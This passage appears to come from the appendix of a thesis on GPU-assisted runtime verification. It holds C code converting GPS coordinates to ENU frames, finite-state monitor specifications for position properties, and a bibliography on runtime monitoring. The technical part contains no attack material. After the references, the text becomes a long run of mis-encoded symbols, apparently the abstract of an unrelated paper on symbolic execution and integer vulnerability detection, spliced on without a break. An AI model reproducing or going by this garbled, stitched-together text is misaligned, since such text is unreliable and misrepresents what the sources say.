* Parameters: float lat, float lon, float alt is LLH of the desired
* position, float* x, float* y, float* z is the memory where the ENU
* solution will be stored
*/
bool CompareToReferences(float lat, float lon, float alt,
float lat_origin, float lon_origin, float alt_origin,
float x_ref, float y_ref, float z_ref,
float delta)
{
//convert desired position and ENU origin from LLH to ECEF
float X, Y, Z;
float X_origin, Y_origin, Z_origin;
Convert_WGS84_To_ECEF(lat, lon, alt, &X, &Y, &Z);
Convert_WGS84_To_ECEF(lat_origin, lon_origin, alt_origin, &X_origin,
&Y_origin, &Z_origin);
//convert from ECEF to ENU
float x, y, z;
Convert_ECEF_To_ENU(lat_origin, lon_origin, X-X_origin, Y-Y_origin,
89
Z-Z_origin, &x, &y, &z);
return ((x - x_ref) < delta && (x - x_ref) > -delta &&
(y - y_ref) < delta && (y - y_ref) > -delta &&
(z - z_ref) < delta && (z - z_ref) > -delta);
}",
"float GetX(float lat, float lon, float alt)
{
//convert desired position and ENU origin from LLH to ECEF
float X, Y, Z;
float X_origin, Y_origin, Z_origin;
Convert_WGS84_To_ECEF(lat, lon, alt, &X, &Y, &Z);
Convert_WGS84_To_ECEF(44.295193, -76.941707, 116.1366, &X_origin,
&Y_origin, &Z_origin);
//convert from ECEF to ENU
float x, y, z;
Convert_ECEF_To_ENU(44.295193, -76.941707, X-X_origin, Y-Y_origin,
Z-Z_origin, &x, &y, &z);
return x;
}",
"float GetY(float lat, float lon, float alt)
{
//convert desired position and ENU origin from LLH to ECEF
float X, Y, Z;
float X_origin, Y_origin, Z_origin;
Convert_WGS84_To_ECEF(lat, lon, alt, &X, &Y, &Z);
Convert_WGS84_To_ECEF(44.295193, -76.941707, 116.1366, &X_origin,
&Y_origin, &Z_origin);
//convert from ECEF to ENU
float x, y, z;
Convert_ECEF_To_ENU(44.295193, -76.941707, X-X_origin, Y-Y_origin,
Z-Z_origin, &x, &y, &z);
return y;
}",
"float GetZ(float lat, float lon, float alt)
{
90
//convert desired position and ENU origin from LLH to ECEF
float X, Y, Z;
float X_origin, Y_origin, Z_origin;
Convert_WGS84_To_ECEF(lat, lon, alt, &X, &Y, &Z);
Convert_WGS84_To_ECEF(44.295193, -76.941707, 116.1366, &X_origin,
&Y_origin, &Z_origin);
//convert from ECEF to ENU
float x, y, z;
Convert_ECEF_To_ENU(44.295193, -76.941707, X-X_origin, Y-Y_origin,
Z-Z_origin, &x, &y, &z);
return z;
}");
//LTL properties specified in Future-LTL syntax
//this property is really [] (a -> X (b U c)) in LTL
properties = ( {name = "xposition"; formalism = "FSM"; syntax =
"digraph G {
\"(0, 0)\" -> \"(1, 1)\" [label = \"(a&&b&&c)\", action =
\"used_params->xtimestamp = gps_second; used_params->x_d =
GetX(llh_lat_dest, llh_lon_dest, llh_alt_dest);
used_params->xtsat = XTSAT\"];
\"(0, 0)\" -> \"(1, 1)\" [label = \"(a&&b)\", action =
\"used_params->xtimestamp = gps_second; used_params->x_d =
GetX(llh_lat_dest, llh_lon_dest, llh_alt_dest);
used_params->xtsat = XTSAT\"];
\"(0, 0)\" -> \"(1, 1)\" [label = \"(a&&c)\", action =
\"used_params->xtimestamp = gps_second; used_params->x_d =
GetX(llh_lat_dest, llh_lon_dest, llh_alt_dest);
used_params->xtsat = XTSAT\"];
\"(0, 0)\" -> \"(1, 1)\" [label = \"(a)\", action =
\"used_params->xtimestamp = gps_second; used_params->x_d =
GetX(llh_lat_dest, llh_lon_dest, llh_alt_dest);
used_params->xtsat = XTSAT\"];
\"(0, 0)\" -> \"(0, 0)\" [label = \"(b&&c)\"];
\"(0, 0)\" -> \"(0, 0)\" [label = \"(b)\"];
\"(0, 0)\" -> \"(0, 0)\" [label = \"(c)\"];
91
\"(0, 0)\" -> \"(0, 0)\" [label = \"(<empty>)\"];
\"(1, 1)\" -> \"(1, 1)\" [label = \"(a&&b&&c)\"];
\"(1, 1)\" -> \"(1, 1)\" [label = \"(a&&b)\"];
\"(1, 1)\" -> \"(1, 1)\" [label = \"(a&&c)\"];
\"(1, 1)\" -> \"(-1, 2)\" [label = \"(a)\"];
\"(1, 1)\" -> \"(0, 0)\" [label = \"(b&&c)\"];
\"(1, 1)\" -> \"(1, 1)\" [label = \"(b)\"];
\"(1, 1)\" -> \"(0, 0)\" [label = \"(c)\"];
\"(1, 1)\" -> \"(-1, 2)\" [label = \"(<empty>)\"];
\"(-1, 2)\" -> \"(-1, 2)\" [label = \"(a&&b&&c)\"];
\"(-1, 2)\" -> \"(-1, 2)\" [label = \"(a&&b)\"];
\"(-1, 2)\" -> \"(-1, 2)\" [label = \"(a&&c)\"];
\"(-1, 2)\" -> \"(-1, 2)\" [label = \"(a)\"];
\"(-1, 2)\" -> \"(-1, 2)\" [label = \"(b&&c)\"];
\"(-1, 2)\" -> \"(-1, 2)\" [label = \"(b)\"];
\"(-1, 2)\" -> \"(-1, 2)\" [label = \"(c)\"];
\"(-1, 2)\" -> \"(-1, 2)\" [label = \"(<empty>)\"];
\"(-1, 2)\" [label=\"(-1, 2)\", style=filled, color=red]
\"(1, 1)\" [label=\"(1, 1)\", style=filled, color=darkseagreen1]
\"(0, 0)\" [label=\"(0, 0)\", style=filled, color=darkseagreen1]
}"
},
{name = "yposition"; formalism = "FSM"; syntax =
"digraph G {
\"(0, 0)\" -> \"(1, 1)\" [label = \"(d&&e&&f)\",
action = \"used_params->ytimestamp = gps_second; used_params->y_d =
GetY(llh_lat_dest, llh_lon_dest, llh_alt_dest);
used_params->ytsat = YTSAT\"];
\"(0, 0)\" -> \"(1, 1)\" [label = \"(d&&e)\",
action = \"used_params->ytimestamp = gps_second; used_params->y_d =
GetY(llh_lat_dest, llh_lon_dest, llh_alt_dest);
used_params->ytsat = YTSAT\"];
\"(0, 0)\" -> \"(1, 1)\" [label = \"(d&&f)\",
action = \"used_params->ytimestamp = gps_second; used_params->y_d =
GetY(llh_lat_dest, llh_lon_dest, llh_alt_dest);
used_params->ytsat = YTSAT\"];
\"(0, 0)\" -> \"(1, 1)\" [label = \"(d)\",
action = \"used_params->ytimestamp = gps_second; used_params->y_d =
92
GetY(llh_lat_dest, llh_lon_dest, llh_alt_dest);
used_params->ytsat = YTSAT\"];
\"(0, 0)\" -> \"(0, 0)\" [label = \"(e&&f)\"];
\"(0, 0)\" -> \"(0, 0)\" [label = \"(e)\"];
\"(0, 0)\" -> \"(0, 0)\" [label = \"(f)\"];
\"(0, 0)\" -> \"(0, 0)\" [label = \"(<empty>)\"];
\"(1, 1)\" -> \"(1, 1)\" [label = \"(d&&e&&f)\"];
\"(1, 1)\" -> \"(1, 1)\" [label = \"(d&&e)\"];
\"(1, 1)\" -> \"(1, 1)\" [label = \"(d&&f)\"];
\"(1, 1)\" -> \"(-1, 2)\" [label = \"(d)\"];
\"(1, 1)\" -> \"(0, 0)\" [label = \"(e&&f)\"];
\"(1, 1)\" -> \"(1, 1)\" [label = \"(e)\"];
\"(1, 1)\" -> \"(0, 0)\" [label = \"(f)\"];
\"(1, 1)\" -> \"(-1, 2)\" [label = \"(<empty>)\"];
\"(-1, 2)\" -> \"(-1, 2)\" [label = \"(d&&e&&f)\"];
\"(-1, 2)\" -> \"(-1, 2)\" [label = \"(d&&e)\"];
\"(-1, 2)\" -> \"(-1, 2)\" [label = \"(d&&f)\"];
\"(-1, 2)\" -> \"(-1, 2)\" [label = \"(d)\"];
\"(-1, 2)\" -> \"(-1, 2)\" [label = \"(e&&f)\"];
\"(-1, 2)\" -> \"(-1, 2)\" [label = \"(e)\"];
\"(-1, 2)\" -> \"(-1, 2)\" [label = \"(f)\"];
\"(-1, 2)\" -> \"(-1, 2)\" [label = \"(<empty>)\"];
\"(-1, 2)\" [label=\"(-1, 2)\", style=filled, color=red]
\"(1, 1)\" [label=\"(1, 1)\", style=filled, color=darkseagreen1]
\"(0, 0)\" [label=\"(0, 0)\", style=filled, color=darkseagreen1]
}"
},
{name = "zposition"; formalism = "FSM"; syntax =
"digraph G {
\"(0, 0)\" -> \"(1, 1)\" [label = \"(g&&h&&k)\",
action = \"used_params->ztimestamp = gps_second; used_params->z_d =
GetZ(llh_lat_dest, llh_lon_dest, llh_alt_dest);
used_params->ztsat = ZTSAT\"];
\"(0, 0)\" -> \"(1, 1)\" [label = \"(g&&h)\",
action = \"used_params->ztimestamp = gps_second; used_params->z_d =
GetZ(llh_lat_dest, llh_lon_dest, llh_alt_dest);
used_params->ztsat = ZTSAT\"];
\"(0, 0)\" -> \"(1, 1)\" [label = \"(g&&k)\",
93
action = \"used_params->ztimestamp = gps_second; used_params->z_d =
GetZ(llh_lat_dest, llh_lon_dest, llh_alt_dest);
used_params->ztsat = ZTSAT\"];
\"(0, 0)\" -> \"(1, 1)\" [label = \"(g)\",
action = \"used_params->ztimestamp = gps_second; used_params->z_d =
GetZ(llh_lat_dest, llh_lon_dest, llh_alt_dest);
used_params->ztsat = ZTSAT\"];
\"(0, 0)\" -> \"(0, 0)\" [label = \"(h&&k)\"];
\"(0, 0)\" -> \"(0, 0)\" [label = \"(h)\"];
\"(0, 0)\" -> \"(0, 0)\" [label = \"(k)\"];
\"(0, 0)\" -> \"(0, 0)\" [label = \"(<empty>)\"];
\"(1, 1)\" -> \"(1, 1)\" [label = \"(g&&h&&k)\"];
\"(1, 1)\" -> \"(1, 1)\" [label = \"(g&&h)\"];
\"(1, 1)\" -> \"(1, 1)\" [label = \"(g&&k)\"];
\"(1, 1)\" -> \"(-1, 2)\" [label = \"(g)\"];
\"(1, 1)\" -> \"(0, 0)\" [label = \"(h&&k)\"];
\"(1, 1)\" -> \"(1, 1)\" [label = \"(h)\"];
\"(1, 1)\" -> \"(0, 0)\" [label = \"(k)\"];
\"(1, 1)\" -> \"(-1, 2)\" [label = \"(<empty>)\"];
\"(-1, 2)\" -> \"(-1, 2)\" [label = \"(g&&h&&k)\"];
\"(-1, 2)\" -> \"(-1, 2)\" [label = \"(g&&h)\"];
\"(-1, 2)\" -> \"(-1, 2)\" [label = \"(g&&k)\"];
\"(-1, 2)\" -> \"(-1, 2)\" [label = \"(g)\"];
\"(-1, 2)\" -> \"(-1, 2)\" [label = \"(h&&k)\"];
\"(-1, 2)\" -> \"(-1, 2)\" [label = \"(h)\"];
\"(-1, 2)\" -> \"(-1, 2)\" [label = \"(k)\"];
\"(-1, 2)\" -> \"(-1, 2)\" [label = \"(<empty>)\"];
\"(-1, 2)\" [label=\"(-1, 2)\", style=filled, color=red]
\"(1, 1)\" [label=\"(1, 1)\", style=filled, color=darkseagreen1]
\"(0, 0)\" [label=\"(0, 0)\", style=filled, color=darkseagreen1]
}"
});
//all the parameters being involved in the monitoring and their types
parameters = ( {name = "xtimestamp"; type = "float"},
{name = "x_d"; type = "float"},
{name = "xtsat"; type = "float"},
{name = "ytimestamp"; type = "float"},
94
{name = "y_d"; type = "float"},
{name = "ytsat"; type = "float"},
{name = "ztimestamp"; type = "float"},
{name = "z_d"; type = "float"},
{name = "ztsat"; type = "float"});
//mapping of the predicates on the program variables
predicates = ( {name = "a"; syntax = "llh_lat_dest_prev != llh_lat_dest"},
{name = "b"; syntax =
"gps_second < used_params->xtimestamp + used_params->xtsat"},
{name = "c"; syntax =
"(GetX(llh_lat, llh_lon, llh_alt) - used_params->x_d) < XDELTA";
device = "GPU"},
{name = "d"; syntax =
"llh_lon_dest_prev != llh_lon_dest"},
{name = "e"; syntax =
"gps_second < used_params->ytimestamp + used_params->ytsat"},
{name = "f"; syntax =
"(GetY(llh_lat, llh_lon, llh_alt) - used_params->y_d) < YDELTA";
device = "GPU"},
{name = "g"; syntax =
"llh_alt_dest_prev != llh_alt_dest"},
{name = "h"; syntax =
"gps_second < used_params->ztimestamp + used_params->ztsat"},
{name = "k"; syntax =
"(GetZ(llh_lat, llh_lon, llh_alt) - used_params->z_d) < ZDELTA";
device = "GPU"});
//all program variables being involved in the monitoring and their types
program_variables = ( {name = "x"; type = "float"},
{name = "y"; type = "float"},
{name = "llh_lat"; type = "float"},
{name = "llh_lon"; type = "float"},
{name = "llh_alt"; type = "float"},
{name = "gps_second"; type = "float"},
{name = "llh_lat_dest"; type = "float"},
{name = "llh_lon_dest"; type = "float"},
{name = "llh_alt_dest"; type = "float"},
95
{name = "llh_lat_dest_prev"; type = "float"},
{name = "llh_lon_dest_prev"; type = "float"},
{name = "llh_alt_dest_prev"; type = "float"});
96
References
[1] P. Avgustinov, J. Tibble, and O. de Moor. Making trace monitors feasible. In ACM
SIGPLAN Notices , volume 42, pages 589–608. ACM, 2007.
[2] M. Barnett, K. Leino, and W. Schulte. The spec# programming system: An overview.
Construction and analysis of safe, secure, and interoperable smart devices , pages 49–
69, 2005.
[3] H. Barringer, A. Goldberg, K. Havelund, and K. Sen. Program monitoring with ltl
in eagle. In Parallel and Distributed Processing Symposium, 2004. Proceedings. 18th
International , page 264. IEEE, 2004.
[4] H. Barringer, D. Rydeheard, and K. Havelund. Rule systems for run-time monitoring:
from eagle to ruler. Journal of Logic and Computation , 20(3):675–706, 2010.
[5] E. Bartocci, R. Grosu, A. Karmarkar, S.A. Smolka, S.D. Stoller, E. Zadok, and
J. Seyster. Adaptive runtime verification. 2012.
[6] A. Bauer, M. Leucker, and C. Schallhart. Runtime Verification for LTL and TLTL.
ACM Transactions on Software Engineering and Methodology (TOSEM) , 20(4):14:1–
14:64, 2011.
[7] E. Bodden. J-lo-a tool for runtime-checking temporal assertions. Master’s thesis,
RWTH Aachen university , 2005.
[8] E. Bodden. Efficient hybrid typestate analysis by determining continuation-equivalent
states. In International Conference on Software Engineering (ICSE) , pages 5–14, 2010.
[9] E. Bodden, P. Lam, and L. Laurie. Clara: A framework for partially evaluating finite-
state runtime monitors ahead of time. In Runtime Verification (RV) , pages 183–197.
2010.
97
[10] B. Bonakdarpour, S. Navabpour, and S. Fischmeister. Sampling-based runtime veri-
fication. In Formal Methods (FM) , pages 88–102, 2011.
[11] B. Bonakdarpour, Johnson J. Thomas, and S. Fischmeister. Time-triggered program
self-monitoring. In IEEE International Conference on Embedded and Real-Time Com-
puting Systems and Applications (RTCSA) , pages 260–269, 2012.
[12] F. Chen and G. Ro ̧ su. Java-MOP: A monitoring oriented programming environ-
ment for java. In Tools and Algorithms for the construction and analysis of systems
(TACAS) , pages 546–550, 2005.
[13] F. Chen and G. Ro ̧ su. Towards monitoring-oriented programming: A paradigm com-
bining specification and implementation. Electronic Notes in Theoretical Computer
Science , 89(2):108–127, 2003.
[14] F. Chen and G. Ro ̧ su. Parametric trace slicing and monitoring. Tools and Algorithms
for the Construction and Analysis of Systems , pages 246–261, 2009.
[15] S. Colin and L. Mariani. Run-Time Verification , chapter 18. Springer-Verlag LNCS
3472, 2005.
[16] M. d’Amorim and K. Havelund. Event-based runtime verification of java programs.
ACM SIGSOFT Software Engineering Notes , 30(4):1–7, 2005.
[17] D. Drusinsky. The temporal rover and the atg rover. SPIN Model Checking and
Software Verification , pages 323–330, 2000.
[18] M. B. Dwyer, G. S. Avrunin, and J. C. Corbett. Patterns in property specifications for
finite-state verification. In International Conference on Software Engineering (ICSE) ,
pages 411 –420, 1999.
[19] T. Elmas, S. Okur, and S. Tasiran. Rethinking runtime verification on hundreds of
cores: Challenges and opportunities. Technical Report UCB/EECS-2011-74, EECS
Department, University of California, Berkeley, June 2011.
[20] Deepak Garg, Limin Jia, and Anupam Datta. Policy auditing over incomplete logs:
theory, implementation and applications. In Proceedings of the 18th ACM conference
on Computer and communications security , CCS ’11, pages 151–162, New York, NY,
USA, 2011. ACM.
98
[21] D. Giannakopoulou and K. Havelund. Automata-Based Verification of Temporal
Properties on Running Programs. In Automated Software Engineering (ASE) , pages
412–416, 2001.
[22] Khronos OpenCL Working Group. The opencl specification, 2011. Version 1.1.
[23] J. Ha, M. Arnold, S. M. Blackburn, and K. S. McKinley. A concurrent dynamic anal-
ysis framework for multicore hardware. In Object-Oriented Programming, Systems,
Languages, and Applications (OOPSLA) , pages 155–174, 2009.
[24] J. Holub and S. Stekr. On parallel implementations of deterministic finite automata.
InImplementation and Application of Automata (CIAA) , pages 54–64, 2009.
[25] X. Huang, J. Seyster, S. Callanan, K. Dixit, R. Grosu, S. A. Smolka, S. D. Stoller,
and E. Zadok. Software monitoring with controllable overhead. Software tools for
technology transfer (STTT) , 14(3):327–347, 2012.
[26] D. Jin. Making runtime monitoring of parametric properties practical . PhD thesis,
University of Illinois, 2012.
[27] G. Kiczales, E. Hilsdale, J. Hugunin, M. Kersten, J. Palm, and W. Griswold. An
overview of aspectj. ECOOP 2001???Object-Oriented Programming , pages 327–354,
2001.
[28] M. Kim, M. Viswanathan, H. Ben-Abdallah, S. Kannan, I. Lee, and O. Sokolsky.
Formally specified monitoring of temporal properties. In Real-Time Systems, 1999.
Proceedings of the 11th Euromicro Conference on , pages 114–122. IEEE, 1999.
[29] O. Kupferman and M. Y. Vardi. Model Checking of Safety Properties. In Computer
Aided Verification (CAV) , pages 172–183, 1999.
[30] C Lattner and V. Adve. LLVM: A compilation framework for lifelong program analysis
and transformation. In International Symposium on Code Generation and Optimiza-
tion: Feedback Directed and Runtime Optimization , page 75, 2004.
[31] H. Lu and A. Forin. The design and implementation of p2v, an architecture for zero-
overhead online verification of software programs. Technical report, Technical Report
MSR-TR-2007–99, Microsoft Research, 2007.
[32] P.k Meredith, D. Jin, F. Chen, and G. Ro ̧ su. Efficient monitoring of parametric
context-free patterns. Journal of Automated Software Engineering , 17(2):149–180,
June 2010.
99
[33] S. Navabpour, C. W. Wu, B. Bonakdarpour, and S. Fischmeister. Efficient techniques
for near-optimal instrumentation in time-triggered runtime verification. In Interna-
tional Conference on Runtime Verification (RV) , 2011. To appear.
[34] R. Pellizzoni, P. Meredith, M. Caccamo, and G. Rosu. Hardware runtime monitor-
ing for dependable cots-based real-time embedded systems. In Real-Time Systems
Symposium, 2008 , pages 481 –491, 30 2008-dec. 3 2008.
[35] SJ Pennycook, SD Hammond, SA Wright, JA Herdman, I. Miller, and SA Jarvis.
An investigation of the performance portability of opencl. Journal of Parallel and
Distributed Computing , 2012.
[36] A. Pnueli and A. Zaks. PSL Model Checking and Run-Time Verification via Testers.
InSymposium on Formal Methods (FM) , pages 573–586, 2006.
[37] M. Roesch et al. Snort-lightweight intrusion detection for networks. In Proceedings
of the 13th USENIX conference on System administration , pages 229–238. Seattle,
Washington, 1999.
[38] J. Seyster, K. Dixit, X. Huang, R. Grosu, K. Havelund, S. A. Smolka, S. D. Stoller,
and E. Zadok. Aspect-oriented instrumentation with GCC. In Runtime Verification
(RV) , pages 405–420, 2010.
[39] K.L. Spafford, J.S. Meredith, S. Lee, D. Li, P.C. Roth, and J.S. Vetter. The tradeoffs
of fused memory hierarchies in heterogeneous computing architectures. In Proceedings
of the 9th conference on Computing Frontiers , pages 103–112. ACM, 2012.
[40] J.E. Stone, D. Gohara, and G. Shi. Opencl: A parallel programming standard for
heterogeneous computing systems. Computing in science & engineering , 12(3):66,
2010.
[41] J. J. Thomas, S. Fischmeister, and D. Kumar. Lowering overhead in sampling-based
execution monitoring and tracing. In Languages, compilers, and tools for embedded
systems (LCTES) , pages 101–110, 2011.
[42] Chun Wah Wallace Wu. Methods for reducing monitoring overhead in runtime veri-
fication. M.a.sc. thesis, University of Waterloo, 2012.
[43] H. Zhu, M. B. Dwyer, and S. Goddard. Predictable runtime monitoring. In Euromicro
Conference on Real-Time Systems (ECRTS) , pages 173–183, 2009.
100
[44] Craig B. Zilles and Gurindar S. Sohi. A programmable co-processor for profiling.
InInternational Symposium on High Performance Computer Architecture (HPCA) ,
pages 241–253, 2001.
101❍   ✁✂ ✄☎ ✆ ✄✝ ♣✞ ✆ ✟ ♣✂ ✁✠ ✄ ✠✡ ✞ ❛ ✡ ☛ ✂ ✄ ✆ ✟ ☞ ❜ ✞ ☎   ✌ ☛ ✠   ✂ ✂ ☛ ✂ ✟✞ ✠✌❛ ✄ ✠✡ ♣✞ ✆ ✆   ✂ ✠ ✂   ✝ ☛ ✡ ✠ ✄ ✆ ✄ ☛ ✠ ✄ ✠✌   ✆   ✝ ✆ ✄ ✠✡ ✈ ✁❛✠   ✂ ✞ ❜✄ ❛ ✄ ✆ ✍❉ ✎ ✏ ✑ ❈ ✒ ✓ ✏ ✔ ❨ ✕ ✏ ✑ ❩ ✒ ✕ ✏ ✑ ✔ ▲ ✖ ✕ ✏ ✑ ❈ ✒ ✓ ✏ ✑ ✔ ❨ ✖ ❉ ✓ ✏ ✑ ✔ ❳ ✖ ✕ ✎ ✗ ✒ ✕ ✏ ❙ ✘ ✏■ ✙ ✚✛ ✜ ✛ ✢ ✛ ✣ ♦ ✤ ✥ ♦ ✤ ✛ ✦ ✧ ★ ✣ ✱ ✩ ✪ ✜ ✙ ✣ ✚✣ ❆ ✫ ✧ ✬ ✣ ✭ ✮ ♦ ✤ ✥ ✫ ✜ ✣ ✙ ✫ ✣ ✚❇
✣ ✜✯
✜ ✙✰
✱ ✩ ✪ ✜ ✙ ✧✫ ✪ ✣ ✙ ✬ ♦ ✙✰
❤ ✲ ✳ ✜ ✚ ✴ ✜ ✚ ✫ ✧ ✚ ✴ ✧ ✫ ✴ ✫ ✙✵ ✶ ✷ ✸ ✹ ✺ ✻ ✸ ❸ ✼ ✽ ✾ ✿ ❀ ✽ s ❁ ❂ ❃ ❄ ✾ ❅ ❡❊ ❡ ❅ ❋ ● ✾ ❃ ✿ ✾ ✿ ❏ ❑ ● ▼ ✽ ❡✿ ✽ ✾ ● ✾ ◆ ❡ ❞ ❡ ❖● ❡ ❅● ✾ ❃ ✿ ❃
P✽ ❃
P●
◗❑
❘❡ ◆ ❋ ❄ ✿ ❡
❘❑ ❂ ✾ ❄ ✾ ● ✾ ❡✽ ❞ ❡ ◆ ❡❄ ❃ ❏
q❋ ✾ ❅
❚❄ s
❘❡ ❅ ❡✿ ● ❄ s
❯❱ ● ▼ ❑ ✽ ❑ ❄ ❃ ● ❃
P❑ ❏ ❏ ❄ ✾ ❅❑ ● ✾ ❃ ✿ ❑ ✿ ❞
❘❡✽ ❡ ❑
❘❅ ▼ ❏
❘❃ ❀
❘❡✽ ✽
❯❲ ❃
◗❡ ◆ ❡
❘❬✽ s ❁ ❂ ❃ ❄ ✾ ❅ ❡❊ ❡ ❅ ❋ ● ✾ ❃ ✿ ✽ ● ✾ ❄ ❄ ✽ ❋
P P❡
❘✽
P ❘❃ ❁ ● ▼ ❡ ✽ ❅❑ ❄ ❑ ❂ ✾ ❄ ✾ ● s ❏
❘❃ ❂ ❄ ❡❁ ✾ ✿❏
❘❑ ❅● ✾ ❅ ❡ ❬ ❡✽ ❏ ❡ ❅✾ ❑ ❄ ❄ s
◗▼ ❡✿ ❑ ❏ ❏ ❄ ✾ ❡ ❞ ● ❃ ❄ ❑
❘❀ ❡ ✽ ❅❑ ❄ ❡ ❃
❘◆ ❡
❘s ❅ ❃ ❁ ❏ ❄ ❡❊❏
❘❃ ❀
❘❑ ❁ ✽
❯❱ ✿ ● ▼ ✾ ✽ ❏ ❑ ❏ ❡
❘❬
◗❡ ❏
❘❃ ❏ ❃ ✽ ❡ ❑ ✿ ❡
◗▼ ❡❋
❘✾ ✽ ● ✾ ❅ ❏ ❑ ● ▼❏
❘❋ ✿ ✾ ✿ ❀ ❑ ❄ ❀ ❃
❘✾ ● ▼ ❁ ❂ ❑ ✽ ❡ ❞ ❃ ✿ ✿ ❃ ✿ ❖
P❑ ● ❑ ❄ ❡
❘❘❃
❘▼ ❑ ✿ ❞ ❄ ✾ ✿ ❀
❭ ❪ ❫ ❴❲
❵❏ ❑ ● ● ❡
❘✿
❘❡ ❅ ❃ ❀ ✿ ✾ ● ✾ ❃ ✿
❯ ❫✾
❘✽ ● ❄ s ❬ ✾ ● ❋ ✽ ❡ ● ▼
❘❡❡ ❏ ❑ ● ● ❡
❘✿ ✽ ● ❃
❘❡ ❅ ❃ ❀ ✿ ✾ ❝ ❡❪ ❫ ❴❲ ❁ ❃ ❞ ❋ ❄ ❡ ✾ ✿ ❂ ✾ ✿ ❑
❘s ❅ ❃ ❞ ❡ ❑ ✿ ❞ ● ▼ ❡✿ ✽ ● ❃ ❏ ❑ ✿ ❑ ❄ s ❝✾ ✿ ❀
❪ ❫ ❴❲❂
❘❑ ✿ ❅ ▼ ❡✽
◗▼ ❡✿ ❋ ✽ ✾ ✿ ❀ ✽ s ❁ ❂ ❃ ❄ ✾ ❅ ❡❊ ❡ ❅ ❋ ● ✾ ❃ ✿
❯ ❢❃ ❞ ❡❁ ❃ ✿ ✽ ●
❘❑ ● ❡ ● ▼ ❡❡
P P❡ ❅● ✾ ◆ ❡✿ ❡✽ ✽ ❃
P● ▼ ✾ ✽ ✿ ❡
◗❑ ❏ ❏
❘❃ ❑ ❅ ▼ ❬
◗❡ ▼ ❑ ◆ ❡ ✾ ❁ ❏ ❄ ❡❁ ❡✿ ● ❡ ❞❑ ❏
❘❃ ● ❃ ● s ❏ ❡ ● ❃ ❃ ❄
❣ ❘❋ ✿
❴❂ ● ❂ ❑ ✽ ❡ ❞ ❃ ✿ ❑ ❂ ✾ ✿ ❑
❘s ✽ ● ❑ ● ✾ ❅ ✾ ✿ ● ❡ ❀ ❡
❘◆ ❋ ❄ ✿ ❡
❘❑ ❂ ✾ ❄ ✾ ● s ❞ ❡ ● ❡ ❅● ✾ ✿ ❀ ● ❃ ❃ ❄
❭✐ ● ❑ ● ✾ ❅● ❑ ✾ ✿ ●
❵ ❯ ❴❊ ❏ ❡
❘✾ ❁ ❡✿ ● ❑ ❄
❘❡✽ ❋ ❄ ● ✽❑
❘❡
q❋ ✾ ● ❡ ❡✿ ❅ ❃ ❋
❘❑ ❀ ✾ ✿ ❀
❯ ❣ ❘❋ ✿
❴❂ ● ❅❑ ✿ ❡
P P❡ ❅● ✾ ◆ ❡❄ s
❘❡ ❅ ❃ ❀ ✿ ✾ ❝ ❡
❪ ❫ ❴❲❁ ❃ ❞ ❋ ❄ ❡✽ ✾ ✿ ❂ ✾ ✿ ❑
❘s ❏
❘❃ ❀
❘❑ ❁ ❬ ✽ ✾ ❀ ✿ ✾
❥❅❑ ✿ ● ❄ s
❘❡ ❞ ❋ ❅ ❡ ● ▼ ❡ ✽ ❡ ❑
❘❅ ▼✽ ❏ ❑ ❅ ❡ ❑ ✿ ❞ ▼ ❑ ◆ ❡ ✿ ❃ ❃ ❁ ✾ ✽ ✽ ✾ ❃ ✿ ✽ ❃
P●
❘❋ ❡ ◆ ❋ ❄ ✿ ❡
❘❑ ❂ ✾ ❄ ✾ ● ✾ ❡✽
❯❦ ● ❄ ❑ ✽ ● ❬ ✾ ●▼ ❑ ✽ ❞ ❡ ● ❡ ❅● ❡ ❞ ❃ ✿ ❡ ❝ ❡
❘❃ ❖ ❞ ❑ s ✾ ✿ ● ❡ ❀ ❡
❘◆ ❋ ❄ ✿ ❡
❘❑ ❂ ✾ ❄ ✾ ● s ✾ ✿
◗✾ ❞ ❡❄ s ❋ ✽ ❡ ❞✾ ❁ ❑ ❀ ❡
❘❡ ❅ ❃ ❀ ✿ ✾ ● ✾ ❃ ✿ ❄ ✾ ❂
❘❑
❘s
❧✾ ❂ ❏ ✿ ❀ ◆
♠ ❯♥ ❯♠ r ❯t ✉✇1 2 ✹ 3 ✷ ❖ ✽ s ❁ ❂ ❃ ❄ ✾ ❅ ❡❊ ❡ ❅ ❋ ● ✾ ❃ ✿ ❬ ❏ ❑ ● ▼ ❏
❘❋ ✿ ✾ ✿ ❀ ❬ ❡
❘❘❃
❘▼ ❑ ✿ ❞ ❄ ✾ ✿ ❀ ❬❂ ✾ ✿ ❑
❘s ❅ ❃ ❞ ❡ ❬ ◆ ❋ ❄ ✿ ❡
❘❑ ❂ ✾ ❄ ✾ ● s ❞ ❡ ● ❡ ❅● ✾ ❃ ✿4 5 4 6 7 8 9 10 ❶ ❷ 7 ❹ 9 6❺ ✒ ✓ ❻ ✓ ✕ ❻ ✓ ❼ ✕ ✏ ❽ ✕ ❾ ❿ ✕ ✏ ➀ ✕ ✑ ✓ ✗ ➀ ✎ ✕ ➁ ➁ ➂ ❽ ✗❽ ❼ ➃ ✎ ➂ ✖ ➄ ✓ ➅ ✓ ➄ ✘ ➀ ✖ ✎ ✏➆ ➇ ➈ ✔ ➆ ➉ ➈ ➀ ✎ ❿ ✘ ➂ ✏ ✓ ❻ ✕ ➃ ✖ ➂ ✖ ➀ ❽ ❾ ✓ ➀ ✓ ➄ ➀ ✖ ✎ ✏5 4
➀ ➄ ✕ ✏ ✓ ➅ ➁ ➂ ✎ ❻ ✓ ✕ ❻ ✖ ➀ ✒ ❼✓ ➀ ✖ ➄❻ ✓ ➂ ✕ ➀ ✖ ✎ ✏ ✗ ➃ ✓ ➀ ➊ ✓ ✓ ✏ ❿ ✕ ❻ ✖ ✕ ➃ ➂ ✓ ✗ ✔ ➊ ✒ ✖ ➄ ✒ ❼ ✕ ➋ ✓ ✖ ➀ ✓ ✕ ✗❽ ➀ ✎ ✘ ✏ ❾ ✓ ❻ ➌✗➀ ✕ ✏ ❾ ➀ ✒ ✓ ✖ ✏ ➀ ✓ ❻ ✏ ✕ ➂ ➂ ✎ ✑ ✖ ➄ ✎➍
➀ ✒ ✓ ➁ ❻ ✎ ✑ ❻ ✕ ❼ ✕ ✏ ❾➎
✏ ❾ ➄ ✎ ✏ ❾ ✘ ➄ ✖ ❿ ✓✓ ✗✗ ✓ ✏ ➄ ✓ ✎➍
➄ ✎ ✏ ✗➀ ❻ ✕ ✖ ✏ ➀ ❻ ✓ ➂ ✕ ➀ ✖ ✎ ✏ ✗ ➃ ✓ ➀ ➊ ✓ ✓ ✏ ➀ ✒ ✓ ❾ ✕ ➀ ✕➍
✎ ✘ ✏ ❾5➏
